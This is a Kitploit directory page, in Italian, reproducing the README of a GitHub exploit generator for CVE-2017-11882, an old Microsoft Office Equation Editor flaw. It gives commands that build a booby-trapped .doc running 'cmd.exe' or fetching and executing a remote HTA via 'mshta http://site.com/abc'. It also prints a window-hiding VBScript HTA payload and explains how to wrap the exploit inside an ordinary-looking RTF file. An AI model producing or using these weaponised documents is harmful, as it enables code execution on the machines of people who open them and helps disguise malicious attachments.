Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-11882 — CVE-2017-11882 da https://github.com/embedi/CVE-2017-11882 | Kitploit
Strumenti/GitHubGitHub/ridter/cve-2017-11882
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubridter/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 da https://github.com/embedi/CVE-2017-11882

Vedi Repository
5352428 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-11882

43b script originale da https://github.com/embedi/CVE-2017-11882

109b script originale da https://github.com/unamer/CVE-2017-11882/ (grande rispetto, ora il codice di unamer può eseguire shellcode~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Ricerca: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Analisi delle patch: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

Utilizzo

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

usa mshta

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

root@kitploit:~
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

La lunghezza del comando per 43b non può superare 43 byte, per 109b non può superare 109 byte

Sample exploit for CVE-2017-11882 (avvio di calc.exe come payload)

La cartella example contiene un file .rtf che sfrutta la vulnerabilità CVE-2017-11882 ed esegue la calcolatrice nel sistema.

Sul contenuto personalizzato

In realtà, il metodo per il contenuto personalizzato l'ho imparato da altri esperti. L'avevo già scritto in uno script molto tempo fa, e non intendevo renderlo pubblico, ma visto che qualcuno all'interno del gruppo lo ha già rilasciato, non ho scelta. Il metodo è in realtà molto semplice: basta aprire il normale documento rtf con un editor di testo, copiare tutto il contenuto prima di {\*\datastore e sostituire tutto ciò che precede {\object\objautlink\objupdate. Quindi, scrivere uno script è molto facile.

Per aggiungere contenuto personalizzato, utilizzare qualsiasi script:

root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

Il contenuto personalizzato si trova in input.rtf.

Per quanto riguarda l'ultimo script di sfruttamento da 605 byte di unamer, non lo aggiornerò; chi è interessato può modificarlo da solo.

Scarica lo strumento